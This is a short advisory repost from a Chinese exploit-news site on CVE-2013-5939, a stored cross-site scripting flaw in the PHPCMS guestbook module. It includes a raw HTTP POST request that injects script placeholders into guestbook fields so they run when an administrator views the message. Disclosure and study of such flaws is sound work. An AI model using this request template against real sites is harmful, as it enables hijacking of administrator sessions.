漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

PHPCMS guestbook module Stored XSS Vulnerability

CVE-2013-5939:PHPCMS guestbook module Stored XSS Vulnerability

Severity: Important

Vendor: phpcms.cn

Versions Affected: All of use guestbook module phpcms

Description: The phpcms has be found the Stored XSS Vulnerability if use the guestbook module.someone can insert xss
code at the front guestbook,when admin view this message in the admin control
panel,the xss code has be implemented

Exploit:

[php]
POST /index.php?m=guestbook&c=index&a=register&siteid=1 HTTP/1.1
Host: www.attack.cn
User-Agent: Mozilla/5.0 (compatible;
Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=40360ct0tfshplcik807r9phr4;
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:317typeid=54&codes=&title=[xsscode]&introduce=[xsscode]&department=&area=&name=&tel=&email=&isbbs=on&code=dmsc&dosubmit=
[/php]

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » PHPCMS guestbook module Stored XSS Vulnerability

评论